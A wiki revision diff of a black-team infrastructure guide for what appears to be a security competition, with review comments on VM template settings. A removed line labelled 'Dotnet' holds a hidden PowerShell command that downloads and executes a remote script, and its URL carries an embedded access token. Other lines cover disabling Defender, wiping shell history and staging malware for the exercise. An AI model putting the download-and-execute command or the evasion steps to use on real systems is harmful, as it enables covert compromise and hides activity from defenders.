guides:lockdown_black_team

Differences

This shows you the differences between two versions of the page.

guides:lockdown_black_team [2019/12/19 04:44]
aibekzhy Swappiness
guides:lockdown_black_team [2020/05/22 15:28]
aibekzhy [Post Deployment Checklist]
Line 18: Line 18:
     - Copy Paste Enabled     - Copy Paste Enabled
     - Graphics to support Full HD/​Automatic Graphics Detection     - Graphics to support Full HD/​Automatic Graphics Detection
 +    - Ensure time Synchronized
 +    - Potentially disable DHCP
 +    - Make sure the best NIC type is attached "​vmxnet3"​ -> "​vmxnet2"​ -> etc
  
   * Linux:   * Linux:
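Review bot: "Potentially disable DHCP" and "Ensure time Synchronized" are too vague to act on. Say whether it is the DHCP client on the template that is to be disabled (so deployed VMs keep the static addresses the inventory expects) and name the time source the VMs should sync against, since domain authentication and cross-host log correlation both break once clocks drift. The NIC line should also spell out the fallback after vmxnet2 instead of "etc", for example e1000, so the reader does not have to guess which adapter is still acceptable.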
Line 24: Line 27:
     - SSH server (installed, enabled, running)     - SSH server (installed, enabled, running)
     - Decrease swappiness to 10     - Decrease swappiness to 10
-    - Ubuntu specific:+    ​- Python2 and python3 installed (less headache if you are using ansible) 
 +    ​- Ubuntu-specific:
       - Ensure networkd is a renderer       - Ensure networkd is a renderer
 +      - Install resolvconf to configure DNS on 18.*
     - Fedora specific:     - Fedora specific:
       - Depending on implementation look into installing network-scripts       - Depending on implementation look into installing network-scripts
       - Install libselinux-python       - Install libselinux-python
     - Ensure Release of child OSes match supported OS: https://​kb.vmware.com/​s/​article/​1005870     - Ensure Release of child OSes match supported OS: https://​kb.vmware.com/​s/​article/​1005870
 +
 +
   * Windows:   * Windows:
     - VMWare tools     - VMWare tools
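Review bot: "18.*" on the resolvconf line should read "Ubuntu 18.04" (or whichever releases were actually tested), and the line should say why it is needed: on that release DNS is handled by systemd-resolved, and installing resolvconf takes over /etc/resolv.conf, which is the behaviour change the reader needs to expect. On the "Python2 and python3 installed" line, name the Ansible version that still needs Python 2 on managed hosts; Python 2 reached end of life in January 2020, so the default should be Python 3 only. The two blank lines added before "* Windows:" are a formatting nit.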
Line 37: Line 44:
     - Ensure that Windows Remote Management service is started Automatically     - Ensure that Windows Remote Management service is started Automatically
     - Enable Ping via Firewall (Allow ICMP Packets)     - Enable Ping via Firewall (Allow ICMP Packets)
-    - Disable Windows Defender (Registry/​GPO)+    - Disable/​Uninstall ​Windows Defender (Registry/​GPO)
     - Disable Windows Updates (Registry/​GPO/​Services)     - Disable Windows Updates (Registry/​GPO/​Services)
     - Ensure Sleep is disabled     - Ensure Sleep is disabled
-    - Try to Debloat as much as possible: https://​github.com/​Sycnex/​Windows10Debloater+    - Try to Debloat as much as possible: https://​github.com/​Sycnex/​Windows10Debloater ​(Might not worth it) 
 +    - Sometimes windows may start randomly shutting down. In which case please look into the following 
 +    - Use High-performance Battery Profile 
 +    - Windows 10 Enterprise specific: 
 +      - Make sure when Template is deployed, it has an Ethernet Access. If it doesn'​t have one, it will reboot endlessly: https://​superuser.com/​questions/​933754/​why-does-windows-10-shut-down-hourly-with-initiated-power-off-on-behalf-of-nt-a  
  
   * Pfsense:   * Pfsense:
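Review bot: "Sometimes windows may start randomly shutting down. In which case please look into the following" is a fragment with nothing nested under it; "Use High-performance Battery Profile" and the "Windows 10 Enterprise specific" item sit at the same level, so it is unclear whether they are the remedy being referred to. Suggest one item, "If VMs start shutting down randomly, check:", with the power profile and the Ethernet/endless-reboot note indented beneath it. Also "(Might not worth it)" should be "(might not be worth it)", and the "Disable/Uninstall Windows Defender" line should say which of the two is intended per image, since uninstalling is not reversible the way a registry or GPO toggle is.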
Line 51: Line 63:
   * Ensure you clean up the history of all applications/​shells   * Ensure you clean up the history of all applications/​shells
   * Ensure you take a snapshot of the entire infrastructure after deploying your malware   * Ensure you take a snapshot of the entire infrastructure after deploying your malware
 +  * Manually login to every VM after the red team is done pre-staging. This ensures that everything is still operational,​ and in addition, it loads a lot of things from disk to memory, which ensures a smoother experience at the start of the competition. ​
 +  * If the performance of VMs is very slow, try to lower the number of snapshots or use the snapshots that were created are no longer than a day before the competition.
  
  
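Review bot: the new "Manually login to every VM after the red team is done pre-staging" item conflicts in ordering with "Ensure you clean up the history of all applications/shells" and "take a snapshot ... after deploying your malware" above it: a manual login after the cleanup writes fresh shell history and logon events, and a snapshot taken before the login does not capture the warmed-up state the item is meant to provide. State the intended order explicitly, for example log in and verify, then clean history, then snapshot. The second new bullet also needs rewording: "or use snapshots that were created no more than a day before the competition", and "login" should be "log in".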
Line 66: Line 80:
  
 Things that are typically requested: Things that are typically requested:
-  * Windows: Dotnet ​(powershell.exe -Sta -Nop -w hidden -Command "​IEX(IWR 'https://raw.githubusercontent.com/NotoriousRebel/​temppp/​master/​builder.ps1?​token=AIVA5C62REQKCZAXPVLPOUS5TAWXC'​ -UseBasicParsing)"​)+  * Windows: ​ 
 +    * Dotnet https://dotnet.microsoft.com/download 
 +    * Python executables
   * C2 Servers   * C2 Servers
 +  * 
 ===== Naming Conventions ===== ===== Naming Conventions =====
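Review bot: removing the old "Dotnet" line is the right call, but the removed command embedded an access token in the raw.githubusercontent.com URL and this revision history still displays it, so the token should be revoked rather than only deleted from the page. The replacement "Dotnet https://dotnet.microsoft.com/download" also stops telling readers to IEX a remote script, which is the pattern the "Python executables" entry should follow as well (link to the official download). The new empty "*" bullet after "C2 Servers" is a stray list item and should be removed or filled in.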
  
  • guides/lockdown_black_team.txt
  • Last modified: 2020/06/08 05:49
  • by aibekzhy